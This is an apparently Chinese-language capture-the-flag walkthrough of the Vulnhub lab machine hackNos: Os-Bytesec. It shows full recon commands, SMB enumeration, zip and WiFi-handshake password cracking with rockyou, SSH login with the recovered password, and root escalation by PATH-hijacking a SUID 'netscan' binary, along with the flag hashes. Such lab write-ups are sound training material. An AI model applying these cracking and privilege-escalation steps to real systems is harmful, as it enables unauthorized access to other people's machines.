Vulnhub之OS Bytesec靶机详细测试过程
OS Bytesec
作者:jason huawen
靶机信息
名称:hackNos: Os-Bytesec
地址:
https://www.vulnhub.com/entry/hacknos-os-bytesec,393/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:60:36:cf 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:31:66:d4 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-25 22:14 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00027s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12554f1ee97eea8769901c1fb0633ff3 (RSA)
| 256 a670f10edf4e737d7142d644f12f24d2 (ECDSA)
|_ 256 f0f8fd24650734c2d49a1fc0b82ed83a (ED25519)
MAC Address: 08:00:27:31:66:D4 (Oracle VirtualBox virtual NIC)
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: 0s
| smb2-time:
| date: 2023-03-26T02:14:37
|_ start_date: N/A
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: nitin
| NetBIOS computer name: NITIN\x00
| Domain name: 168.1.7
| FQDN: nitin.168.1.7
|_ System time: 2023-03-26T07:44:37+05:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.91 seconds
获得Shell
首先从smb协议入手收集信息:
──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ smbclient -L 192.168.56.254
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nitin server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP NITIN
──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ enum4linux 192.168.56.254
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)
利用enum4linux工具识别出用户名为sagar, blackjax, smb
利用Kali linux的浏览器访问80端口,从返回页面的源代码有以下注释:
<div class="copyright"><!-- James/Hacker -->
Copyright ©<script>document.write(new Date().getFullYear());</script> All rights reserved | This template is made with James/Hacker <i class="fa fa-heart-o" aria-hidden="true"></i> by <a href="http:jameshacker.me" target="_blank">James</a>
<!-- James/Hacker --></div>
</div>
</footer>
<!-- Footer top section end -->
似乎没有意义。
──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-03-25 22:20:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: c0e, size: 59686492a99fd, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /html/: Directory indexing found.
+ OSVDB-3092: /html/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-03-25 22:20:34 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,php,js,html,txt
[+] Timeout: 10s
===============================================================
2023/03/25 22:21:04 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 3086]
/.html (Status: 403) [Size: 279]
/news (Status: 301) [Size: 315] [--> http://192.168.56.254/news/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.254/img/]
/html (Status: 301) [Size: 315] [--> http://192.168.56.254/html/]
/gallery (Status: 301) [Size: 318] [--> http://192.168.56.254/gallery/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.254/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.254/js/]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1323306 / 1323366 (100.00%)===============================================================
2023/03/25 22:22:39 Finished
===============================================================
目录扫描阶段一无所获,但是其实注意到网页中有句:####################GET#####smb##############free
而前面也知道有用户名smb,而且smb free,是不是意味着没有密码,注意smbclient -L并没有得到共享目录/smb,
┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec/_anatomy.png.extracted]
└─$ smbclient //192.168.56.254/smb -U smb -p
Password for [WORKGROUP\smb]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Nov 4 06:50:37 2019
.. D 0 Mon Nov 4 06:37:28 2019
main.txt N 10 Mon Nov 4 06:45:38 2019
safe.zip N 3424907 Mon Nov 4 06:50:37 2019
9204224 blocks of size 1024. 5824788 blocks available
smb: \> get main.txt
getting file \main.txt of size 10 as main.txt (4.9 KiloBytes/sec) (average 4.9 KiloBytes/sec)
smb: \> get safe.zip
getting file \safe.zip of size 3424907 as safe.zip (101352.3 KiloBytes/sec) (average 95561.3 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.254\smb\
┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ unzip safe.zip
Archive: safe.zip
[safe.zip] secret.jpg password:
┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ zip2john safe.zip > hashes
ver 2.0 efh 5455 efh 7875 safe.zip/secret.jpg PKZIP Encr: TS_chk, cmplen=60550, decmplen=62471, crc=6D48091C ts=0BA2 cs=0ba2 type=8
ver 2.0 efh 5455 efh 7875 safe.zip/user.cap PKZIP Encr: TS_chk, cmplen=3364011, decmplen=6920971, crc=717BA9D6 ts=6088 cs=6088 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hacker1 (safe.zip)
1g 0:00:00:00 DONE (2023-03-25 23:01) 14.28g/s 468114p/s 468114c/s 468114C/s softball27..eatme1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
解压后里面有个图片和抓包。图片检查后未发现有用信息。打开user.cap发现是一个wifi抓包,wifi名为blackjax。
─(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
找到Key为:snowflake
会不会用户名是blackjax, 密码为snowflake
┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
└─$ ssh blackjax@192.168.56.254 -p 2525
The authenticity of host '[192.168.56.254]:2525 ([192.168.56.254]:2525)' can't be established.
ED25519 key fingerprint is SHA256:1l05HpfviqAHWEW02NNLxk4zhf2Ne1fS5QnCd7hTGQA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.254]:2525' (ED25519) to the list of known hosts.
blackjax@192.168.56.254's password:
Permission denied, please try again.
blackjax@192.168.56.254's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
151 packages can be updated.
100 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Nov 4 15:37:42 2019 from 192.168.1.50
$ id
uid=1001(blackjax) gid=1001(blackjax) groups=1001(blackjax)
$
提权
$ cat user.txt
_ _ _____ ______ _____ ______ _ _____
| | | |/ ____| ____| __ \ | ____| | /\ / ____|
| | | | (___ | |__ | |__) |_____| |__ | | / \ | | __
| | | |\___ \| __| | _ /______| __| | | / /\ \| | |_ |
| |__| |____) | |____| | \ \ | | | |____ / ____ \ |__| |
\____/|_____/|______|_| \_\ |_| |______/_/ \_\_____|
Go To Root.
MD5-HASH : f589a6959f3e04037eb2b3eb0ff726ac
blackjax@nitin:/tmp$ find / -perm -4000 -type f 2>/dev/null
blackjax@nitin:/tmp$ ls -alh /usr/bin/netscan
-rwsr-xr-x 1 root root 7.3K Nov 4 2019 /usr/bin/netscan
netscan命令有SUID位
blackjax@nitin:/tmp$ /usr/bin/netscan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:2525 0.0.0.0:* LISTEN 1012/sshd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 890/smbd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1015/mysqld
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 890/smbd
tcp 0 0 192.168.56.254:139 192.168.56.206:50834 ESTABLISHED 1876/smbd
tcp 0 168 192.168.56.254:2525 192.168.56.206:57618 ESTABLISHED 5032/sshd: blackjax
tcp6 0 0 :::2525 :::* LISTEN 1012/sshd
tcp6 0 0 :::445 :::* LISTEN 890/smbd
tcp6 0 0 :::139 :::* LISTEN 890/smbd
tcp6 0 0 :::80 :::* LISTEN 1150/apache2
netscan命令应该在执行netstat命令因此可以生成我们自己的netstat
blackjax@nitin:/tmp$ echo '/bin/sh' > netstat
blackjax@nitin:/tmp$ chmod 777 netstat
blackjax@nitin:/tmp$ export PATH=/tmp:$PATH
blackjax@nitin:/tmp$ /usr/bin/netscan
# cd /root
# ls -alh
total 36K
drwx------ 3 root root 4.0K Nov 4 2019 .
drwxr-xr-x 22 root root 4.0K Nov 4 2019 ..
-rw------- 1 root root 2.5K Nov 4 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4.0K Nov 4 2019 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 505 Nov 4 2019 root.txt
-rw------- 1 root root 4.9K Nov 4 2019 .viminfo
# cat root.txt
____ ____ ____ ______ ________ ___ ______
/ __ \/ __ \/ __ \/_ __/ / ____/ / / | / ____/
/ /_/ / / / / / / / / / / /_ / / / /| |/ / __
/ _, _/ /_/ / /_/ / / / / __/ / /___/ ___ / /_/ /
/_/ |_|\____/\____/ /_/____/_/ /_____/_/ |_\____/
/_____/
Conguratulation..
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Author : Rahul Gehlaut
Contact : https://www.linkedin.com/in/rahulgehlaut/
WebSite : jameshacker.me
#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
